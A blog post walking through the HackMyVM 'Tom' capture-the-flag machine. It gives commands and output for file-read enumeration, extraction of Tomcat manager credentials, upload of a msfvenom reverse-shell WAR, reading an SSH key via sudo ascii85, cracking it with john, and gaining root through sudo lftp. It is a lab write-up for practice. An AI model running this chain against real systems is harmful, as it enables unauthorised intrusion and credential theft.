Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Tom Walkthrough

HackMyVm Tom Walkthrough

Key points: tomcat configuration and upload

Scan ports.

 ~ nmap -sV -sC -p-  -Pn  -oN ports.log                                       
 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
 Starting Nmap 7.91 ( ) at 2021-10-16 09:56 CST
 Nmap scan report for deathnote.vuln (
 Host is up (0.00073s latency).
 Not shown: 65532 closed ports
 22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 55:5f:3f:15:c7:cb:5f:09:d6:a1:f5:70:06:d0:dd:bc (RSA)
 |   256 ec:db:41:19:b8:60:bc:53:6f:c7:ef:c6:d3:ee:b9:b8 (ECDSA)
 |_  256 2e:0d:03:27:a5:2a:0b:4e:b0:6a:42:01:57:fd:a9:9f (ED25519)
 80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 8080/tcp open  http    Apache Tomcat 9.0.54
 |_http-favicon: Apache Tomcat
 |_http-title: Apache Tomcat/9.0.54
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel        

Enum port 80.

 ~ gobuster dir -u -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log 
 /index.html           (Status: 200) [Size: 10701]
 /javascript           (Status: 301) [Size: 321] [-->]
 /tomcat.php           (Status: 200) [Size: 0]              

Fuzz tomcat.php.

 ~ wfuzz -u ''    -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
 ID           Response   Lines    Word       Chars       Payload
 000007570:   200        27 L     39 W       1441 Ch     "filez"          

Get /etc/passwd.

 ~ curl ''       

We need to get home dir of tomcat.

 ~ curl ''                    fish-0 | 0 [10:29:59]
 Description=Tomcat 9 servlet container
 Environment="CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC"

Check password file at tomcat HOME dir.

 ~ curl '' 
 <role rolename="admin-gui"/>
 <role rolename="manager-script"/>
 <user username="sml" password="H4ckMyP4$$w0rD!!!" roles="admin-gui,manager-script"/>

Generate reverse shell for tomcat and upload.

 ~ msfvenom  -p java/shell_reverse_tcp lhost= lport=1234 -f war -o rev.war       
 Payload size: 13323 bytes
 Final size of war file: 13323 bytes
 Saved as: rev.war
 ~ curl --upload-file rev.war  -u 'sml:H4ckMyP4$$w0rD!!!' ''
 OK - Desplegada aplicación en trayectoria de contexto [/upload]

Get reverse shell.

 ~ curl ''                  
 ~ nc -nlvp 1234                                                                                       fish-0 | 0 [10:48:06]
 Ncat: Version 7.91 ( )
 Ncat: Listening on :::1234
 Ncat: Listening on
 Ncat: Connection from
 Ncat: Connection from
 uid=1001(tomcat) gid=1001(tomcat) grupos=1001(tomcat)

Check sudo -l.

 tomcat@tom:/var/www/html$ sudo -l
 sudo -l
 Matching Defaults entries for tomcat on tom:
     env_reset, mail_badpass,
 User tomcat may run the following commands on tom:
     (nathan) NOPASSWD: /usr/bin/ascii85

Read id_rsa of user nathan.

 sudo -u nathan /usr/bin/ascii85 /home/nathan/.ssh/id_rsa -w 0

Decode ascii85 online, then get id_rsa.

 Proc-Type: 4,ENCRYPTED
 DEK-Info: DES-EDE3-CBC,5065755920B77C45

Decrypt id_rsa.

 ~ /usr/share/john/ id_rsa  > hash
 ~ john --wordlist=/usr/share/wordlists/rockyou.txt hash                                               bash-0 | 1 [11:08:11]
 Using default input encoding: UTF-8
 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
 Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
 Cost 2 (iteration count) is 2 for all loaded hashes
 Will run 2 OpenMP threads
 Note: This format may emit false positives, so it will keep trying even after
 finding a possible candidate.
 Press 'q' or Ctrl-C to abort, almost any other key for status
 darkness         (id_rsa)
 1g 0:00:00:29 81.06% (ETA: 11:09:00) 0.03336g/s 387097p/s 387097c/s 387097C/s 9405es..9405872
 Session aborted

Login ssh as usr nathan, check sudo -l.

 ~ ssh nathan@ -i id_rsa                                                                 john-0 | 1 [11:08:54]
 Enter passphrase for key 'id_rsa':
 Linux tom 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
 /usr/bin/xauth:  file /home/nathan/.Xauthority does not exist
 nathan@tom:~$ sudo -l
 Matching Defaults entries for nathan on tom:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User nathan may run the following commands on tom:
     (root) NOPASSWD: /usr/bin/lftp

Get root.

 nathan@tom:~$ sudo lftp
 lftp :~> !id
 uid=0(root) gid=0(root) grupos=0(root)
 lftp :~> !bash
 root@tom:/home/nathan# id;hostname
 uid=0(root) gid=0(root) grupos=0(root)



Powered By Z-BlogPHP 1.7.1